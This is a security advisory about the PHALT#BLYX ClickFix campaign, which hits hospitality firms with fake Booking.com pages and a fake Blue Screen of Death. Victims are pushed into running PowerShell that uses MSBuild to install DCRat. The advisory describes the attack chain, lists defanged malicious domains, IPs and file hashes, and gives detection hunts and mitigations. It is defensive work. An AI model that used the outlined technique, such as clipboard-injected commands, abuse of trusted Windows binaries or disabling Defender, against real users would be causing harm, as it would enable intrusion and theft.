January 15th, 2026

PHALT#BLYX ClickFix Campaign Exploits Fake Booking.com Errors and Windows Blue Screen of Death to Deploy DCRat

High

Our Cyber Threat Intelligence Unit is monitoring an active ClickFix-style social engineering campaign, known as PHALT#BLYX, that targets hospitality organizations through phishing emails impersonating Booking.com reservation and billing notifications. First observed in late December 2025 and publicly reported in early January 2026, the campaign primarily affects European hospitality sector organizations but employs a technique broadly applicable to any business that relies on online booking and payment platforms. The attack abuses ClickFix-style deception, combining spoofed Booking.com pages, fake system error screens, and a simulated Windows Blue Screen of Death (BSOD) to convince users that their system is malfunctioning. Users are instructed to paste and execute attacker-supplied commands that deploy DCRat remote access trojans and facilitate the delivery of follow-on malware. By exploiting trust in well-known brands and using highly convincing visual lures, the campaign bypasses traditional email and endpoint controls and relies on user-driven execution to establish compromise.

Technical Details

Threat Name: PHALT#BLYX ClickFix Campaign
Attack Type: Phishing → Social Engineering → Malware Execution
Severity: High
Primary Payload: DCRat (DarkCrystal RAT)
Targeted Sector: Hospitality (European hotels and booking operators)
Attack Chain:
- Phishing Delivery: Threat actors send phishing emails impersonating Booking.com, often about reservations, billing disputes, or urgent booking issues.
  - These messages create urgency to entice recipients to click embedded links.
- Redirect & Spoofed Website: Victims are redirected via attacker infrastructure (e.g., oncameraworkout[.]com/ksbo) to spoofed Booking.com clone sites such as low-house[.]com, which appear legitimate and promote interaction.
- ClickFix Visual Deception: After interacting with the fake booking site, the page shows error messages or fake CAPTCHA prompts before switching to a full-screen fake Windows BSOD, instructing the victim to “fix” the problem.
- Clipboard Injection: JavaScript embedded in the page silently copies a malicious PowerShell command to the user’s clipboard.
- User-Driven Execution: Victims are instructed to press Win+R, paste the clipboard contents, and execute the command. This launches PowerShell, which:
  - Locates MSBuild.exe
  - Downloads a malicious v.proj file from attacker infrastructure (e.g., 2fa-bns[.]com)
  - Executes it via MSBuild, abusing a trusted Microsoft build tool
- Payload Deployment & Persistence: The MSBuild project delivers DCRat, modifies Windows Defender settings and adds exclusions, creates Startup shortcuts (DeleteApp.url), and injects code into aspnet_compiler.exe for stealthy execution and C2.

Impact

User-Executed Malware: Victims are tricked into manually launching attacker-controlled commands.
Security Control Bypass: Abuse of trusted binaries (PowerShell, MSBuild, aspnet_compiler.exe) evades many endpoint defenses.
Persistent Remote Access: DCRat provides attackers with full interactive control over infected systems.
Credential Theft & Surveillance: RAT deployment facilitates keystroke logging, file theft, screen capture, and lateral movement.
Sector-Specific Risk: Hospitality organizations are heavily targeted due to reliance on booking platforms and high transaction volumes.

Detection Method

Organizations should hunt for:

PowerShell execution involving clipboard-based or pasted commands that download external scripts or project files.
MSBuild.exe executing project files (e.g., v.proj) from %ProgramData%, Temp, or user directories.
Unexpected Defender configuration changes, including disabled protections or added exclusions.
Startup folder artifacts, especially .url shortcut files such as DeleteApp.url.
Process injection or hollowing, particularly into aspnet_compiler.exe.
Outbound C2 traffic on non-standard ports, especially TCP 3535.
ClickFix behavioral patterns, including fake system messages combined with user-executed commands.

Indicators of Compromise

Domains

oncameraworkout[.]com/ksbo

low-house[.]com

2fa-bns[.]com

asj77[.]com

asj88[.]com

asj99[.]com

wmk77[.]com

8eh18dhq9wd[.]click

IPs

194.169.163[.]140

193.221.200[.]233

13.223.25[.]84

File Name	SHA256
Ps1.ps1	cd3604fb9fe210261de11921ff1bea0a7bf948ad477d063e17863cede1fadc41
payload_1.ps1	13b25ae54f3a28f6d01be29bee045e1842b1ebb6fd8d6aca23783791a461d9dd
.ps1	9fac0304cfa56ca5232f61034a796d99b921ba8405166743a5d1b447a7389e4f
v.proj	cd3604fb9fe210261de11921ff1bea0a7bf948ad477d063e17863cede1fadc41
v.proj.ps1	9fc15d50a3df0ac7fb043e098b890d9201c3bb56a592f168a3a89e7581bc7a7d
Stub.exe/Staxs.exe/tydb7.exe	bf374d8e2a37ff28b4dc9338b45bbf396b8bf088449d05f00aba3c39c54a3731
Stub.exe	11c1cfce546980287e7d3440033191844b5e5e321052d685f4c9ee49937fa688
Stub.exe	07845fcc83f3b490b9f6b80cb8ebde0be46507395d6cbad8bc57857762f7213a
Stub.exe	08037de4a729634fa818ddf03ddd27c28c89f42158af5ede71cf0ae2d78fa198
Stub.exe	2f3d0c15f1c90c5e004377293eaac02d441eb18b59a944b2f2b6201bb36f0d63
Stub.exe	33f0672159bb8f89a809b1628a6cc7dddae7037a288785cff32d9a7b24e86f4b
Stub.exe	6bd31dfd36ce82e588f37a9ad233c022e0a87b132dc01b93ebbab05b57e5defd
Stub.exe	1f520651958ae1ec9ee788eefe49b9b143630c340dbecd5e9abf56080d2649de
DeleteApp.url	9c891e9dc6fece95b44bb64123f89ddeab7c5efc95bf071fb4457996050f10a0
Wwigu.exe	e68a69c93bf149778c4c05a3acb779999bc6d5bcd3d661bfd6656285f928c18e
Wwigu.exe	18c75d6f034a1ed389f22883a0007805c7e93af9e43852282aa0c6d5dafaa970
Lbpyjxefa.dll	91696f9b909c479be23440a9e4072dd8c11716f2ad3241607b542b202ab831ce

mix of red, purple, orange, blue bubble shape waves horizontal for cybersecurity and netwo

Recommendations

Train users to never copy, paste, or execute commands displayed by websites or emails.
Treat Booking.com and payment-themed emails with heightened scrutiny and verify via trusted portals.
Restrict and monitor MSBuild.exe and PowerShell usage outside approved development workflows.
Enable PowerShell ScriptBlock and Module Logging and monitor suspicious command lines.
Monitor Startup folders and security configuration changes for unauthorized persistence.
Block known malicious domains and IPs at email, web, and firewall layers.

Conclusion

The PHALT#BLYX ClickFix campaign demonstrates how attackers are combining brand impersonation, fake system failures, and living-off-the-land tooling to trick users into executing malware that delivers persistent remote access. By abusing trusted Microsoft binaries and convincing visual deception, the campaign bypasses traditional defenses and facilitates long-term compromise. We urge organizations to strengthen phishing defenses, restrict LOLBin abuse, and educate users to mitigate risks associated with this ongoing campaign.

References

https://www.securonix.com/blog/analyzing-phaltblyx-how-fake-bsods-and-trusted-build-tools-are-used-to-construct-a-malware-infection/

https://cybersecuritynews.com/new-clickfix-attack-uses-fake-windows-bsod-screens/#google_vignette

https://www.cyware.com/resources/threat-briefings/daily-threat-briefing/cyware-daily-threat-intelligence-january-06-2026

https://socprime.com/active-threats/phaltblyx-analysis/

https://gbhackers.com/clickfix-attack-use/

https://www.darkreading.com/cyberattacks-data-breaches/clickfix-campaign-fake-blue-screen-of-death

https://thehackernews.com/2026/01/fake-booking-emails-redirect-hotel.html